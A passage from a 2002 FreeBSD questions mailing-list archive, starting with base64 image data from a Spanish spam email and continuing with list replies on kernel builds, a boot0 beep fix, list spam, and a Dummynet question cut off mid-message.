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 pSlCF//Z ------=_NextPart_000_0022_01C217D4.8D47E540 Content-Type: image/jpeg; name="=?iso-8859-1?Q?Fondo_de_D=EDa_luminoso.jpg?=" Content-Transfer-Encoding: base64 Content-ID: <002101c217c3$c9afd300$0100c0a8@jose> /9j/4AAQSkZJRgABAgEASABIAAD/7QVoUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAASAAAAAEA AQBIAAAAAQABOEJJTQPzAAAAAAAIAAAAAAAAAAA4QklNBAoAAAAAAAEAADhCSU0nEAAAAAAACgAB AAAAAAAAAAI4QklNA/UAAAAAAEgAL2ZmAAEAbGZmAAYAAAAAAAEAL2ZmAAEAoZmaAAYAAAAAAAEA MgAAAAEAWgAAAAYAAAAAAAEANQAAAAEALQAAAAYAAAAAAAE4QklNA/gAAAAAAHAAAP////////// //////////////////8D6AAAAAD/////////////////////////////A+gAAAAA//////////// /////////////////wPoAAAAAP////////////////////////////8D6AAAOEJJTQQIAAAAAAAQ AAAAAQAAAkAAAAJAAAAAADhCSU0ECQAAAAAD9wAAAAEAAACAAAAAgAAAAYAAAMAAAAAD2wAYAAH/ 2P/gABBKRklGAAECAQBIAEgAAP/+ACdGaWxlIHdyaXR0ZW4gYnkgQWRvYmUgUGhvdG9zaG9wqCA0 LjAA/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwM DAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQUDg4ODhQRDAwM DAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgAgACAAwEiAAIRAQMR Af/dAAQACP/EAT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEAAQUBAQEBAQEAAAAAAAAA AQACAwQFBgcICQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEFQVFhEyJxgTIGFJGhsUIjJBVS wWIzNHKC0UMHJZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXiZfKzhMPTdePzRieUpIW0lcTU5PSl tcXV5fVWZnaGlqa2xtbm9jdHV2d3h5ent8fX5/cRAAICAQIEBAMEBQYHBwYFNQEAAhEDITESBEFR YXEiEwUygZEUobFCI8FS0fAzJGLhcoKSQ1MVY3M08SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOE w9N14/NGlKSFtJXE1OT0pbXF1eX1VmZ2hpamtsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A 9LSS7JlWLMolMkkmpXSTpIqUnCinCQQySTSknWilJkpSQtKxSlJJBKk6ZOkFP//Q9LlJMnVZmVCY qRUUCpSRKUpkErSpBRhOkClkCkmCcJ1rVQmUk0JKUm7p0kEqSTSkUrU//9H0kKQUU8qoCzlclRTy opEqC6SSSSVwlokkihScJAJwEgEKCRTpiE6lLJJJkFLJJJJq5//S9JTJ0ypthcJJkpSUukklqipS kmhSARAQVBJOE6ctWCdJIooYlRKkSok6ppXBSRSCcodEv//T9JSSThVGwxITKZTQhSrUE6QCdOCC uEkySKF5Ugop0QgrpikSokokqCxTKSaEwrlBP8Eyfskh/9T0lSUSkCVUZ2SSYKSKFkkkgipSSdMU lLpFMmJStVLykmlOhaVJJAJ4RQslKSZBL//V9JTwkkqjOunUU4KchSQTpJKWJSTEppQtNLkpkk8I bqUAnSTIqZJSmSRQsmUlEoFIf//W9KCSSdVWdZIJQkkplKZNKSNopc6qMKSZBKycFOkB4pUq1JJ4 CUI0i1kydMUClUpkkkEv/9kAOEJJTQQGAAAAAAAHAAMAAAABAQD//gAnRmlsZSB3cml0dGVuIGJ5 IEFkb2JlIFBob3Rvc2hvcKggNC4wAP/uAA5BZG9iZQBkAAAAAAH/2wCEAAoHBwcIBwoICAoPCggK DxINCgoNEhQQEBIQEBQRDAwMDAwMEQwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwBCwwMFRMV IhgYIhQODg4UFA4ODg4UEQwMDAwMEREMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM DP/AABEIASwBLAMBEQACEQEDEQH/3QAEACb/xAGiAAAABwEBAQEBAAAAAAAAAAAEBQMCBgEABwgJ CgsBAAICAwEBAQEBAAAAAAAAAAEAAgMEBQYHCAkKCxAAAgEDAwIEAgYHAwQCBgJzAQIDEQQABSES MUFRBhNhInGBFDKRoQcVsUIjwVLR4TMWYvAkcoLxJUM0U5KismNzwjVEJ5OjszYXVGR0w9LiCCaD CQoYGYSURUaktFbTVSga8uPzxNTk9GV1hZWltcXV5fVmdoaWprbG1ub2N0dXZ3eHl6e3x9fn9zhI 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 ------=_NextPart_000_0022_01C217D4.8D47E540-- _______________________________________________ Publicidad mailing list Publicidad@sonimag.net http://thor.sonimag.net/mailman/listinfo/publicidad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 18:37:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id CD67F37B401 for ; Sun, 23 Jun 2002 18:37:25 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Sun, 23 Jun 2002 18:37:25 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 18:37:25 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Kernelbuild "the new way" (Was: APM not even a sign) Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020624013725669.AAA723@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 16:01, questions-digest boldly uttered: > Date: Sun, 23 Jun 2002 15:07:03 -0500 > From: David Syphers > > On Sunday 23 June 2002 01:17 am, Bjarne Wichmann Petersen wrote: > > On Saturday 22 June 2002 23:20, David Syphers wrote: > > > > > > I belive the "new way" is _only_ for when you're upgrading the entire > > > system - it's for use between buildworld and installworld. The "old way" > > > is still the way for when you're just building your kernel. > > > > Well, I think Handbook is a bit vague on this. It does say that "the old > way" > > should be used when the source haven't been updated. But since I alway cvsup > > my sourcetree prior to a kernelbuild (and subsequent make world) this really > > doesn't apply. "The new way" should be fine for me, but alas, isn't. > > It's not clear what order you're doing things in. If you cvsup, then follow > the buildworld - buildkernel - installkernel - installworld route, that > should work fine, and there's something wrong if it doesn't. But you can't > build a new kernel and install that, and _then_ buildworld. All sorts of > nasty problems can arise from kernel and world being out of sync. This route > of doing things has never been supported. > > The "old way" is now only for situations like where you want to add a device > or a kernel option to a system, but don't want to upgrade the system to a > later version. So what's the downside of using the "new way" to rebuild a kernel on an existing system who hasn't had its source upgraded since the last build? That's been what I've always done - relatively new FreeBSD user that I am (since 4.1). Any reason not to do it that way? -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 18:44:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 74F0337B404 for ; Sun, 23 Jun 2002 18:44:20 -0700 (PDT) Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 24 Jun 2002 02:44:19 +0100 (BST) To: "Pietralla, Siegfried P" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: yet another boot problem In-Reply-To: Your message of "Mon, 24 Jun 2002 09:45:05 +1000." <16649A8D5C73D51183B80008C728EEB7CC0AAD@AUSYM103> Date: Mon, 24 Jun 2002 02:44:19 +0100 From: Ian Dowse Message-ID: <200206240244.aa47440@salmon.maths.tcd.ie> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <16649A8D5C73D51183B80008C728EEB7CC0AAD@AUSYM103>, "Pietralla, Siegf ried P" writes: >i'm having a problem getting my new install of 4.5 to boot. i've >successfully run through the install onto ad3s3 and the boot manager for the >second disk comes up ( and lets me go back to disk one so i know it's >working ) but when i pick 'f3' it just beeps at me. i can boot into 4.3 in A beep when you press an F-key usually means that boot0 is unable to read the boot sector for the partition you selected, either because the geometry settings in the fdisk partition table don't match the BIOS, or because the cylinder number is greater than 1023. Try telling boot0 to use packet mode by running: boot0cfg -v -o packet /dev/ad3 This will cause boot0 to ignore the geometry and use LBA addressing instead. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 18:46: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id D498D37B400 for ; Sun, 23 Jun 2002 18:45:58 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Sun, 23 Jun 2002 18:45:58 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 18:45:58 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com Cc: David Syphers In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020624014558683.AAA717@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Sun, 23 Jun 2002 16:54:26 -0500 > From: David Syphers > > Still, I don't doubt that intelligent and creative suggestions for better > filtering methods would be welcome Don't bet on it. Been there already. If it weren't for my asbestos jumpsuit.. > , as would hardware donations. I would > assume you should contact the postmaster about the former, and not > questions@. As I mentioned earlier, I may be able to donate a server, and maybe even drop it off where it needs to go. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 19: 1:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id CF73337B400 for ; Sun, 23 Jun 2002 19:01:45 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Sun, 23 Jun 2002 19:01:45 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Sun, 23 Jun 2002 19:01:45 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Spam problem on the list (Was: Re: URGENT) Reply-To: pjklist@ekahuna.com X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020624020145561.AAA732@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Subject: questions-digest V5 #1415 > > > In this issue: > RE: portupgrade with package > Re: Dummynet not working > yet another boot problem > To: freebsd-questions@FreeBSD.ORG > FreeBSD-Questions Posting Help > Getting Wrong MAC address > URGENT > Lose 27 Pounds In 14 Days 624 > [Publicidad] ABGYMNIC + RELOJES GENEVA So let's see, thats: 5 - actual messages (total 8.5 KB) 1 - periodic posting FAQ (18 KB) 3 - SPAMS (total 104 KB) Not bad, eh? -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 19:31:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 229A337B408 for ; Sun, 23 Jun 2002 19:30:49 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5O2UHr21892; Sun, 23 Jun 2002 22:30:18 -0400 Message-ID: <3D1685B1.4010405@potentialtech.com> Date: Sun, 23 Jun 2002 22:36:33 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: BSD Freak Cc: FreeBSD Questions Subject: Re: Dummynet not working References: <1794eaa1798343.17983431794eaa@mbox.com.au> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG BSD Freak wrote: > Hi all, > > I'm relatively inexperienced when it comes to dummynet but I have read > the man page and lots more about it. Basically the situation is this: > We have a FreeBSD 